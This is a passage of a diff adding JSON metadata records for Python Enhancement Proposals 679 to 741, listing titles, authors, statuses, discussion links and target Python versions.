parentheses in assert statements", + "authors": "Pablo Galindo Salgado", + "discussions_to": "https://discuss.python.org/t/pep-679-allow-parentheses-in-assert-statements/13003", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "07-Jan-2022", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0679/" + }, + "680": { + "number": 680, + "title": "tomllib: Support for Parsing TOML in the Standard Library", + "authors": "Taneli Hukkinen, Shantanu Jain", + "discussions_to": "https://discuss.python.org/t/13040", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2022", + "python_version": "3.11", + "post_history": "`09-Dec-2021 `__, `27-Jan-2022 `__,", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/3AHGWYY562HHO55L4Z2OVYUFZP5W73IS/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0680/" + }, + "681": { + "number": 681, + "title": "Data Class Transforms", + "authors": "Erik De Bonte, Eric Traut", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/EAALIHA3XEDFDNG2NRXTI3ERFPAD65Z4/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "02-Dec-2021", + "python_version": "3.11", + "post_history": "`24-Apr-2021 `__, `13-Dec-2021 `__, `22-Feb-2022 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/R4A2IYLGFHKFDYJPSDA5NFJ6N7KRPJ6D/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0681/" + }, + "682": { + "number": 682, + "title": "Format Specifier for Signed Zero", + "authors": "John Belmonte", + "discussions_to": "https://discuss.python.org/t/pep-682-format-specifier-for-signed-zero/13596", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jan-2022", + "python_version": "3.11", + "post_history": "08-Feb-2022", + "resolution": "https://discuss.python.org/t/accepting-pep-682-format-specifier-for-signed-zero/14088", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0682/" + }, + "683": { + "number": 683, + "title": "Immortal Objects, Using a Fixed Refcount", + "authors": "Eric Snow, Eddie Elizondo", + "discussions_to": "https://discuss.python.org/t/18183", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2022", + "python_version": "3.12", + "post_history": "`16-Feb-2022 `__, `19-Feb-2022 `__, `28-Feb-2022 `__, `12-Aug-2022 `__,", + "resolution": "https://discuss.python.org/t/18183/26", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0683/" + }, + "684": { + "number": 684, + "title": "A Per-Interpreter GIL", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-684-a-per-interpreter-gil/19583", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2022", + "python_version": "3.12", + "post_history": "`08-Mar-2022 `__, `29-Sep-2022 `__, `28-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/19583/42", + "requires": "683", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0684/" + }, + "685": { + "number": 685, + "title": "Comparison of extra names for optional distribution dependencies", + "authors": "Brett Cannon", + "discussions_to": "https://discuss.python.org/t/14141", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Mar-2022", + "python_version": null, + "post_history": "`08-Mar-2022 `__", + "resolution": "https://discuss.python.org/t/pep-685-comparison-of-extra-names-for-optional-distribution-dependencies/14141/55", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0685/" + }, + "686": { + "number": 686, + "title": "Make UTF-8 mode default", + "authors": "Inada Naoki", + "discussions_to": "https://discuss.python.org/t/14737", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "18-Mar-2022", + "python_version": "3.15", + "post_history": "`18-Mar-2022 `__, `31-Mar-2022 `__", + "resolution": "https://discuss.python.org/t/14737/9", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0686/" + }, + "687": { + "number": 687, + "title": "Isolating modules in the standard library", + "authors": "Erlend Egeberg Aasland, Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/14824", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "04-Apr-2022", + "python_version": "3.12", + "post_history": "`04-Apr-2022 `__, `11-Apr-2022 `__", + "resolution": "https://discuss.python.org/t/14824/4", + "requires": "489, 573, 630", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0687/" + }, + "688": { + "number": 688, + "title": "Making the buffer protocol accessible in Python", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/19756", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "23-Apr-2022", + "python_version": "3.12", + "post_history": "`23-Apr-2022 `__, `25-Apr-2022 `__, `06-Oct-2022 `__, `26-Oct-2022 `__", + "resolution": "`07-Mar-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0688/" + }, + "689": { + "number": 689, + "title": "Unstable C API tier", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-689-unstable-c-api-tier/20452", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2022", + "python_version": "3.12", + "post_history": "`27-Apr-2022 `__, `25-Aug-2022 `__, `27-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-689-unstable-c-api-tier/20452/13", + "requires": "523", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0689/" + }, + "690": { + "number": 690, + "title": "Lazy Imports", + "authors": "Germ\u00e1n M\u00e9ndez Bravo, Carl Meyer", + "discussions_to": "https://discuss.python.org/t/pep-690-lazy-imports/15474", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2022", + "python_version": "3.12", + "post_history": "`03-May-2022 `__, `03-May-2022 `__", + "resolution": "https://discuss.python.org/t/pep-690-lazy-imports-again/19661/26", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0690/" + }, + "691": { + "number": 691, + "title": "JSON-based Simple API for Python Package Indexes", + "authors": "Donald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/pep-691-json-based-simple-api-for-python-package-indexes/15553", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "04-May-2022", + "python_version": null, + "post_history": "`05-May-2022 `__", + "resolution": "https://discuss.python.org/t/pep-691-json-based-simple-api-for-python-package-indexes/15553/70", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0691/" + }, + "692": { + "number": 692, + "title": "Using TypedDict for more precise \\*\\*kwargs typing", + "authors": "Franek Magiera", + "discussions_to": "https://discuss.python.org/t/pep-692-using-typeddict-for-more-precise-kwargs-typing/17314", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "29-May-2022", + "python_version": "3.12", + "post_history": "`29-May-2022 `__, `12-Jul-2022 `__, `12-Jul-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-692-using-typeddict-for-more-precise-kwargs-typing/17314/81", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0692/" + }, + "693": { + "number": 693, + "title": "Python 3.12 Release Schedule", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "24-May-2022", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0693/" + }, + "694": { + "number": 694, + "title": "Upload 2.0 API for Python Package Repositories", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/pep-694-upload-2-0-api-for-python-package-repositories/16879", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Jun-2022", + "python_version": null, + "post_history": "`27-Jun-2022 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0694/" + }, + "695": { + "number": 695, + "title": "Type Parameter Syntax", + "authors": "Eric Traut", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/BB2BGYJY2YG5IWESKGTAPUQL3N27ZKVW/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "15-Jun-2022", + "python_version": "3.12", + "post_history": "`20-Jun-2022 `__, `04-Dec-2022 `__", + "resolution": "https://discuss.python.org/t/pep-695-type-parameter-syntax/21646/92", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0695/" + }, + "696": { + "number": 696, + "title": "Type Defaults for Type Parameters", + "authors": "James Hilton-Balfe", + "discussions_to": "https://discuss.python.org/t/pep-696-type-defaults-for-typevarlikes/22569", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "14-Jul-2022", + "python_version": "3.13", + "post_history": "`22-Mar-2022 `__, `08-Jan-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-696-type-defaults-for-typevarlikes/22569/34", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0696/" + }, + "697": { + "number": 697, + "title": "Limited C API for Extending Opaque Types", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/19743", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Aug-2022", + "python_version": "3.12", + "post_history": "`24-May-2022 `__, `06-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/19743/30", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0697/" + }, + "698": { + "number": 698, + "title": "Override Decorator for Static Typing", + "authors": "Steven Troxler, Joshua Xu, Shannon Zhu", + "discussions_to": "https://discuss.python.org/t/pep-698-a-typing-override-decorator/20839", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "05-Sep-2022", + "python_version": "3.12", + "post_history": "`20-May-2022 `__, `17-Aug-2022 `__, `11-Oct-2022 `__, `07-Nov-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-698-a-typing-override-decorator/20839/11", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0698/" + }, + "699": { + "number": 699, + "title": "Remove private dict version field added in PEP 509", + "authors": "Ken Jin", + "discussions_to": "https://discuss.python.org/t/pep-699-remove-private-dict-version-field-added-in-pep-509/19724", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "03-Oct-2022", + "python_version": "3.12", + "post_history": "`05-Oct-2022 `__", + "resolution": "https://discuss.python.org/t/pep-699-remove-private-dict-version-field-added-in-pep-509/19724/13", + "requires": null, + "replaces": "509", + "superseded_by": null, + "url": "https://peps.python.org/pep-0699/" + }, + "700": { + "number": 700, + "title": "Additional Fields for the Simple API for Package Indexes", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/pep-700-additional-fields-for-the-simple-api-for-package-indexes/20177", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Oct-2022", + "python_version": null, + "post_history": "`21-Oct-2022 `__", + "resolution": "`19-Dec-2022 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0700/" + }, + "701": { + "number": 701, + "title": "Syntactic formalization of f-strings", + "authors": "Pablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta G\u00f3mez Mac\u00edas", + "discussions_to": "https://discuss.python.org/t/pep-701-syntactic-formalization-of-f-strings/22046", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2022", + "python_version": "3.12", + "post_history": "`19-Dec-2022 `__,", + "resolution": "`14-Mar-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0701/" + }, + "702": { + "number": 702, + "title": "Marking deprecations using the type system", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-702-marking-deprecations-using-the-type-system/23036", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Dec-2022", + "python_version": "3.13", + "post_history": "`01-Jan-2023 `__, `22-Jan-2023 `__", + "resolution": "`07-Nov-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0702/" + }, + "703": { + "number": 703, + "title": "Making the Global Interpreter Lock Optional in CPython", + "authors": "Sam Gross", + "discussions_to": "https://discuss.python.org/t/22606", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "09-Jan-2023", + "python_version": "3.13", + "post_history": "`09-Jan-2023 `__, `04-May-2023 `__", + "resolution": "`24-Oct-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0703/" + }, + "704": { + "number": 704, + "title": "Require virtual environments by default for package installers", + "authors": "Pradyun Gedam", + "discussions_to": "https://discuss.python.org/t/22846", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jan-2023", + "python_version": null, + "post_history": "`16-Jan-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0704/" + }, + "705": { + "number": 705, + "title": "TypedDict: Read-only items", + "authors": "Alice Purcell", + "discussions_to": "https://discuss.python.org/t/pep-705-read-only-typeddict-items/37867", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Nov-2022", + "python_version": "3.13", + "post_history": "`30-Sep-2022 `__, `02-Nov-2022 `__, `14-Mar-2023 `__, `17-Oct-2023 `__, `04-Nov-2023 `__,", + "resolution": "`29-Feb-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0705/" + }, + "706": { + "number": 706, + "title": "Filter for tarfile.extractall", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/23903", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2023", + "python_version": "3.12", + "post_history": "`25-Jan-2023 `__, `15-Feb-2023 `__,", + "resolution": "https://discuss.python.org/t/23903/10", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0706/" + }, + "707": { + "number": 707, + "title": "A simplified signature for __exit__ and __aexit__", + "authors": "Irit Katriel", + "discussions_to": "https://discuss.python.org/t/24402", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Feb-2023", + "python_version": "3.12", + "post_history": "`02-Mar-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-707-a-simplified-signature-for-exit-and-aexit/24402/46", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0707/" + }, + "708": { + "number": 708, + "title": "Extending the Repository API to Mitigate Dependency Confusion Attacks", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/24179", + "status": "Provisional", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Feb-2023", + "python_version": null, + "post_history": "`01-Feb-2023 `__, `23-Feb-2023 `__", + "resolution": "https://discuss.python.org/t/24179/72", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0708/" + }, + "709": { + "number": 709, + "title": "Inlined comprehensions", + "authors": "Carl Meyer", + "discussions_to": "https://discuss.python.org/t/pep-709-inlined-comprehensions/24240", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Feb-2023", + "python_version": "3.12", + "post_history": "`25-Feb-2023 `__", + "resolution": "https://discuss.python.org/t/pep-709-inlined-comprehensions/24240/36", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0709/" + }, + "710": { + "number": 710, + "title": "Recording the provenance of installed packages", + "authors": "Fridol\u00edn Pokorn\u00fd", + "discussions_to": "https://discuss.python.org/t/pep-710-recording-the-provenance-of-installed-packages/25428", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Mar-2023", + "python_version": null, + "post_history": "`03-Dec-2021 `__, `30-Jan-2023 `__, `14-Mar-2023 `__, `03-Apr-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0710/" + }, + "711": { + "number": 711, + "title": "PyBI: a standard format for distributing Python Binaries", + "authors": "Nathaniel J. Smith", + "discussions_to": "https://discuss.python.org/t/pep-711-pybi-a-standard-format-for-distributing-python-binaries/25547", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Apr-2023", + "python_version": null, + "post_history": "`06-Apr-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0711/" + }, + "712": { + "number": 712, + "title": "Adding a \"converter\" parameter to dataclasses.field", + "authors": "Joshua Cannon", + "discussions_to": "https://discuss.python.org/t/pep-712-adding-a-converter-parameter-to-dataclasses-field/26126", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2023", + "python_version": "3.13", + "post_history": "`27-Dec-2022 `__, `19-Jan-2023 `__, `23-Apr-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-712-adding-a-converter-parameter-to-dataclasses-field/26126/98", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0712/" + }, + "713": { + "number": 713, + "title": "Callable Modules", + "authors": "Amethyst Reese", + "discussions_to": "https://discuss.python.org/t/pep-713-callable-modules/26127", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Apr-2023", + "python_version": "3.12", + "post_history": "`23-Apr-2023 `__", + "resolution": "https://discuss.python.org/t/26127/86", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0713/" + }, + "714": { + "number": 714, + "title": "Rename dist-info-metadata in the Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/27471", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Jun-2023", + "python_version": null, + "post_history": "`06-Jun-2023 `__", + "resolution": "`27-Jun-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0714/" + }, + "715": { + "number": 715, + "title": "Disabling bdist_egg distribution uploads on PyPI", + "authors": "William Woodruff", + "discussions_to": "https://discuss.python.org/t/27610", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Jun-2023", + "python_version": null, + "post_history": "`09-Jun-2023 `__", + "resolution": "`24-Jun-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0715/" + }, + "718": { + "number": 718, + "title": "Subscriptable functions", + "authors": "James Hilton-Balfe", + "discussions_to": "https://discuss.python.org/t/28457/", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "23-Jun-2023", + "python_version": "3.13", + "post_history": "`24-Jun-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0718/" + }, + "719": { + "number": 719, + "title": "Python 3.13 Release Schedule", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "26-May-2023", + "python_version": "3.13", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0719/" + }, + "720": { + "number": 720, + "title": "Cross-compiling Python packages", + "authors": "Filipe La\u00edns", + "discussions_to": null, + "status": "Draft", + "type": "Informational", + "topic": "", + "created": "01-Jul-2023", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0720/" + }, + "721": { + "number": 721, + "title": "Using tarfile.data_filter for source distribution extraction", + "authors": "Petr Viktorin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Jul-2023", + "python_version": "3.12", + "post_history": "`04-Jul-2023 `__,", + "resolution": "`02-Aug-2023 `__", + "requires": "706", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0721/" + }, + "722": { + "number": 722, + "title": "Dependency specification for single-file scripts", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/29905", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "19-Jul-2023", + "python_version": null, + "post_history": "`19-Jul-2023 `__", + "resolution": "https://discuss.python.org/t/pep-722-723-decision/36763/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0722/" + }, + "723": { + "number": 723, + "title": "Inline script metadata", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/31151", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Aug-2023", + "python_version": null, + "post_history": "`04-Aug-2023 `__, `06-Aug-2023 `__, `23-Aug-2023 `__, `06-Dec-2023 `__,", + "resolution": "`08-Jan-2024 `__", + "requires": null, + "replaces": "722", + "superseded_by": null, + "url": "https://peps.python.org/pep-0723/" + }, + "724": { + "number": 724, + "title": "Stricter Type Guards", + "authors": "Rich Chiodo, Eric Traut, Erik De Bonte", + "discussions_to": "https://discuss.python.org/t/pep-724-stricter-type-guards/34124", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "typing", + "created": "28-Jul-2023", + "python_version": "3.13", + "post_history": "`30-Dec-2021 `__, `19-Sep-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0724/" + }, + "725": { + "number": 725, + "title": "Specifying external dependencies in pyproject.toml", + "authors": "Pradyun Gedam, Ralf Gommers", + "discussions_to": "https://discuss.python.org/t/31888", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "17-Aug-2023", + "python_version": null, + "post_history": "`18-Aug-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0725/" + }, + "726": { + "number": 726, + "title": "Module ``__setattr__`` and ``__delattr__``", + "authors": "Sergey B Kirpichev", + "discussions_to": "https://discuss.python.org/t/32640/", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2023", + "python_version": "3.13", + "post_history": "`06-Apr-2023 `__, `31-Aug-2023 `__,", + "resolution": "https://discuss.python.org/t/32640/32", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0726/" + }, + "727": { + "number": 727, + "title": "Documentation in Annotated Metadata", + "authors": "Sebasti\u00e1n Ram\u00edrez", + "discussions_to": "https://discuss.python.org/t/32566", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "28-Aug-2023", + "python_version": "3.13", + "post_history": "`30-Aug-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0727/" + }, + "728": { + "number": 728, + "title": "TypedDict with Typed Extra Items", + "authors": "Zixuan James Li", + "discussions_to": "https://discuss.python.org/t/pep-728-typeddict-with-typed-extra-items/45443", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "12-Sep-2023", + "python_version": "3.14", + "post_history": "`09-Feb-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0728/" + }, + "729": { + "number": 729, + "title": "Typing governance process", + "authors": "Jelle Zijlstra, Shantanu Jain", + "discussions_to": "https://discuss.python.org/t/pep-729-typing-governance-process/35362", + "status": "Active", + "type": "Process", + "topic": "governance, typing", + "created": "19-Sep-2023", + "python_version": null, + "post_history": "`04-Oct-2023 `__, `20-Sep-2023 `__", + "resolution": "`20-Nov-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0729/" + }, + "730": { + "number": 730, + "title": "Adding iOS as a supported platform", + "authors": "Russell Keith-Magee", + "discussions_to": "https://discuss.python.org/t/pep730-adding-ios-as-a-supported-platform/35854", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Oct-2023", + "python_version": "3.13", + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-730-adding-ios-as-a-supported-platform/35854/66", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0730/" + }, + "731": { + "number": 731, + "title": "C API Working Group Charter", + "authors": "Guido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel", + "discussions_to": "https://discuss.python.org/t/pep-731-c-api-working-group-charter/36117", + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "11-Oct-2023", + "python_version": null, + "post_history": "`13-Oct-2023 `__, `23-May-2024 `__, `19-Jun-2024 `__", + "resolution": "https://discuss.python.org/t/pep-731-c-api-working-group-charter/36117/12", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0731/" + }, + "732": { + "number": 732, + "title": "The Python Documentation Editorial Board", + "authors": "Joanna Jablonski", + "discussions_to": "https://discuss.python.org/t/pep-732-the-python-documentation-editorial-board/36710", + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "14-Oct-2023", + "python_version": null, + "post_history": "`20-Oct-2023 `__", + "resolution": "https://discuss.python.org/t/pep-732-the-python-documentation-editorial-board/36710/9", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0732/" + }, + "733": { + "number": 733, + "title": "An Evaluation of Python's Public C API", + "authors": "Erlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "16-Oct-2023", + "python_version": null, + "post_history": "`01-Nov-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0733/" + }, + "734": { + "number": 734, + "title": "Multiple Interpreters in the Stdlib", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-734-multiple-interpreters-in-the-stdlib/41147", + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "06-Nov-2023", + "python_version": "3.13", + "post_history": "`14-Dec-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-734-multiple-interpreters-in-the-stdlib/41147/24", + "requires": null, + "replaces": "554", + "superseded_by": null, + "url": "https://peps.python.org/pep-0734/" + }, + "735": { + "number": 735, + "title": "Dependency Groups in pyproject.toml", + "authors": "Stephen Rosen", + "discussions_to": "https://discuss.python.org/t/39233", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Nov-2023", + "python_version": null, + "post_history": "`14-Nov-2023 `__, `20-Nov-2023 `__", + "resolution": "`10-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0735/" + }, + "736": { + "number": 736, + "title": "Shorthand syntax for keyword arguments at invocation", + "authors": "Joshua Bambrick, Chris Angelico", + "discussions_to": "https://discuss.python.org/t/pep-736-keyword-argument-shorthand-final-draft/58504", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "28-Nov-2023", + "python_version": "3.14", + "post_history": "`14-Oct-2023 `__, `17-Jan-2024 `__, `17-Jul-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0736/" + }, + "737": { + "number": 737, + "title": "C API to format a type fully qualified name", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/pep-737-unify-type-name-formatting/39872", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Nov-2023", + "python_version": "3.13", + "post_history": "`29-Nov-2023 `__", + "resolution": "https://discuss.python.org/t/pep-737-unify-type-name-formatting/39872/60", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0737/" + }, + "738": { + "number": 738, + "title": "Adding Android as a supported platform", + "authors": "Malcolm Smith", + "discussions_to": "https://discuss.python.org/t/pep-738-adding-android-as-a-supported-platform/40975", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2023", + "python_version": "3.13", + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-738-adding-android-as-a-supported-platform/40975/23", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0738/" + }, + "739": { + "number": 739, + "title": "Static description file for build details of Python installations", + "authors": "Filipe La\u00edns", + "discussions_to": "https://discuss.python.org/t/pep-739-static-description-file-for-build-details-of-python-installations/44572", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "19-Dec-2023", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0739/" + }, + "740": { + "number": 740, + "title": "Index support for digital attestations", + "authors": "William Woodruff, Facundo Tuesca, Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/pep-740-index-support-for-digital-attestations/44498", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jan-2024", + "python_version": null, + "post_history": "`02-Jan-2024 `__, `29-Jan-2024 `__", + "resolution": "`17-Jul-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0740/" + }, + "741": { + "number": 741, + "title": "Python Configuration C API", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/pep-741-python-configuration-c-api-second-version/45403", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jan-2024", + "python_version": "3.14", + "post_history": "`19-Jan-2024 `__, 